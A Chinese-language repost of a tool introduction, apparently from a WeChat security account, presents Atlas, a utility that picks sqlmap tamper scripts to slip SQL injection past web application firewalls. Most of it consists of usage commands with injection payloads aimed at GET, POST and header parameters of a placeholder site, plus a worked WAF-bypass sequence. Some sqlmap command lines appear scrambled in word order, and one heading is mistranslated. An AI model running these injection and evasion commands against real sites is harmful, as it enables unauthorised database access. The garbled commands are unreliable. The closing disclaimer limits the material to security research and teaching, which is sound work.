Atlas是一个开源工具,可以建议 sqlmap 篡改绕过 WAF/IDS/IPS,该工具基于返回的状态码。
安装
clone https://github.com/m4ll0k/Atlas.git atlas git
cd atlas
# python3+ python atlas.py
用法
atlas.py --url http://site.com/index.php?id=Price_ASC --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v
注入点(带%%inject%%
):
得到:
$ python atlas.py --url http://site.com/index/id/%%10%% --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v
邮政:
$ python atlas.py --url http://site.com/index/id/ -m POST -D 'test=%%10%%' --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v
标题:
$ python atlas.py --url http://site.com/index/id/ -H 'User-Agent: mozilla/5.0%%inject%%' -H 'X-header: test' --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v
篡改串联:
$ python atlas.py --url http://site.com/index/id/%%10%% --payload="-1234 AND 4321=4321-- AAAA" --concat "equaltolike,htmlencode" --random-agent -v
获取篡改列表:
python atlas.py -g
例子
-
运行 SQLMap:
'http://site.com/index.php?id=Price_ASC' --dbs --random-agent -v 3 python sqlmap.py -u
Price_ASC') AND 8716=4837 AND ('yajr'='yajr
被 WAF/IDS/IPS 拦截,现在尝试使用 Atlas:
'http://site.com/index.php?id=Price_ASC' --payload="') AND 8716=4837 AND ('yajr'='yajr" --random-agent -v python atlas.py --url
在此刻:
'http://site.com/index.php?id=Price_ASC' --dbs --random-agent -v 3 --tamper=versionedkeywords,... python sqlmap.py -u
PS:缺失模块
安装模块:pip install humanfriendly
项目地址:https://github.com/m4ll0k/Atlas
原文始发于微信公众号(Ots安全):Atlas - Quick SQLMap Tamper Suggester v1.0
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论